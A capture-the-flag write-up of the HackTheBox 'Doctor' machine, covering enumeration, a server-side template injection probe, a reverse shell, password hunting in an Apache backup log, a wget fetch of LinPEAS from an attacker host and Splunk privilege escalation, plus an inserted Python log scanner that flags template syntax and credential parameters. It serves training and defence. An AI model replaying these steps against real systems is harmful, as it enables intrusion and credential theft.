Doctor Write-Up (HackTheBox)

An easy Linux machine created by egotisticalSW

About this machine

The first thing I did was to add the machine IP to the /etc/hosts file.

nano /etc/hosts

Then, I tried to get a first look at the website.

http://doctor.htb:80/

I saw there was an email address on the home page: ‘info@doctors.htb’.

So, I changed the host name in the /etc/hosts file (doctor.htb => doctors.htb).

nano /etc/hosts

Enumeration

I started this phase with a port scan. I used Nmap to learn more about the host and the services running on its ports.

nmap -sC -sV <IP> -p-
  • -sC : Equivalent to --script=default
  • -sV : Probe open ports to determine service/version info
  • -p- : Scan all ports

There were 3 open ports:

  • SSH on port 22.
  • A web server running Apache httpd 2.4.41 / Werkzeug 1.0.1 / Python 3.8.2 on port 80.
  • Another web server (SSL) running Splunk on port 8089. We can see a robots.txt too.

I tried to get a second look at the website, with the new host name. And… I found a login page.

I saw it was possible to create an account. I first tried to create an admin account without success.

After creating a “test” account, I saw there was a time limit for my account.

Time limit

A twenty-minute time limit.

Here was the /home page when I was logged in.

Then, I displayed the source code…

Source code

Something was interesting here.

“Archive still under beta testing”

So I opened up gobuster to find out whether there were any interesting pages, and at the same time checked this /archive page.

gobuster dir -u <URL> -w <WORDLIST> -x <FILE EXTENSIONS>
  • dir : Enumerate directories
  • -u : The URL to enumerate
  • -w : The word-list to use
  • -x : The extensions of the files you want to find

Accessing /archive gave me a blank page…

After being stuck for some minutes, I tried to send a message with HTML tags in it.

Here was the result… Nothing good, just a blank page. Here is its source code:

First attempt injecting HTML template

Server-Side Template Injection

I tried another thing, just by modifying my first attempt.

Modified first attempt

And then, I got a result..

That made me think of Server-Side Template Injection (SSTI).

According to PortSwigger, here is a short explanation of what it is:

“Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.”

SSTI Mind Map (https://twitter.com/0xklaue/status/1274587855881244672?s=20)

After some research about this vulnerability, I learnt how to test whether the app was vulnerable to it.

So, I tried it…

SSTI attempt

IT WORKED PERFECTLY !

Results for SSTI

I began to look for an exploit and found this:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md

For obvious reasons, I will not show you how I exploited it, but I think I gave you all you need to know.

Exploit

After exploiting this vulnerability, I was able to spawn a reverse shell.

Reverse shell opened as “web”

I looked for user.txt and found that it is owned by a user named shaun, so I wasn’t able to read it.

The thing I tried after the initial foothold was to find out whether there was an interesting backup file (a lot of these files have passwords stored in them).

find / -type f -name '*backup*' 2>/dev/null
  • -type : the type of object you are looking for (file, directory…)
  • -name : the name of the object (quoted so the shell does not expand the wildcard before find sees it)

Backup file

Then, I found an interesting one.

cat /var/log/apache2/backup

As this file contains a lot of data, I used grep to make my reading easier.

grep pass /var/log/apache2/backup

And I found shaun’s password…
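Two things in this write-up are worth turning into a detection routine: the template syntax that revealed the SSTI on /archive, and the credentials that ended up in the Apache backup log because they were sent in a URL. The script below is an added example, not part of the original post or of the Doctor machine: it parses Apache "combined" access-log lines, percent-decodes the request target, flags template-engine markers in user-controlled fields, and flags GET parameters whose names suggest a credential. The sample log lines are constructed for the example and do not come from the box.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines in Apache "combined" log format. They are NOT taken
# from the Doctor machine; they only imitate the traffic this write-up describes.
SAMPLE_LOG = """\
10.10.14.5 - - [05/Sep/2020:11:16:27 +0000] "GET /home HTTP/1.1" 200 2534 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:17:02 +0000] "POST /post/new HTTP/1.1" 302 209 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:17:31 +0000] "GET /archive?title=%7B%7B7*7%7D%7D HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:18:04 +0000] "GET /reset_password?email=user@example.com&password=NotARealPassw0rd HTTP/1.1" 500 453 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:18:40 +0000] "GET /search?q=%3C%25%3D+1+%25%3E HTTP/1.1" 200 301 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Opening tokens of common template syntaxes (Jinja2/Twig, Freemarker/Velocity,
# ERB/JSP, Ruby interpolation). A request carrying one of these in a user-controlled
# field is worth a look; on its own it is not proof of exploitation.
TEMPLATE_MARKERS = ("{{", "{%", "${", "<%", "#{")

# Query-parameter names that should never carry a secret in a GET request, because
# the full URL lands in the access log (the backup log in this write-up is that case).
SENSITIVE_PARAM_RE = re.compile(r"pass|pwd|secret|token|api[_-]?key", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decoded_target(target):
    """Percent-decode the request target once so encoded markers become visible."""
    return unquote_plus(target)


def template_markers(text):
    """Return the template-syntax markers present in text, in TEMPLATE_MARKERS order."""
    return [marker for marker in TEMPLATE_MARKERS if marker in text]


def credential_params(target):
    """Return the query-parameter names in target that look like credentials."""
    query = urlsplit(target).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if SENSITIVE_PARAM_RE.search(name)]


def analyse(log_text):
    """Scan access-log text and return a list of finding dicts, in log order."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue  # not a combined-format line; skip rather than crash
        target = decoded_target(entry["target"])
        for marker in template_markers(target):
            findings.append({"line": lineno, "kind": "template_syntax",
                             "detail": marker, "ip": entry["ip"], "target": target})
        for name in credential_params(entry["target"]):
            findings.append({"line": lineno, "kind": "credential_in_url",
                             "detail": name, "ip": entry["ip"], "target": target})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} ({f['detail']}) from {f['ip']} -> {f['target']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. The credential check is the remediation side of the backup-log finding: any hit there means a form is submitting secrets by GET and the log itself now needs to be treated as sensitive.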

After logging in as shaun and reading user.txt, I immediately ran LinPEAS for the privilege escalation part.

Privilege Escalation

I started a Python web server on my machine to transfer LinPEAS to the victim machine.

(Attacker side) python3 -m http.server 8888
(Victim side) wget http://<Attacker-IP>:<PORT>/linpeas.sh

When LinPEAS finished its work, I could not find a nice privilege escalation vector, but I found a user named Splunk.

After some research, I found SplunkWhisperer2, a Python script for local/remote privilege escalation.

I downloaded the script with git clone and used it in remote mode.

PWNED !!!

Thank you for reading this write-up, I hope it helped you.

kaarb0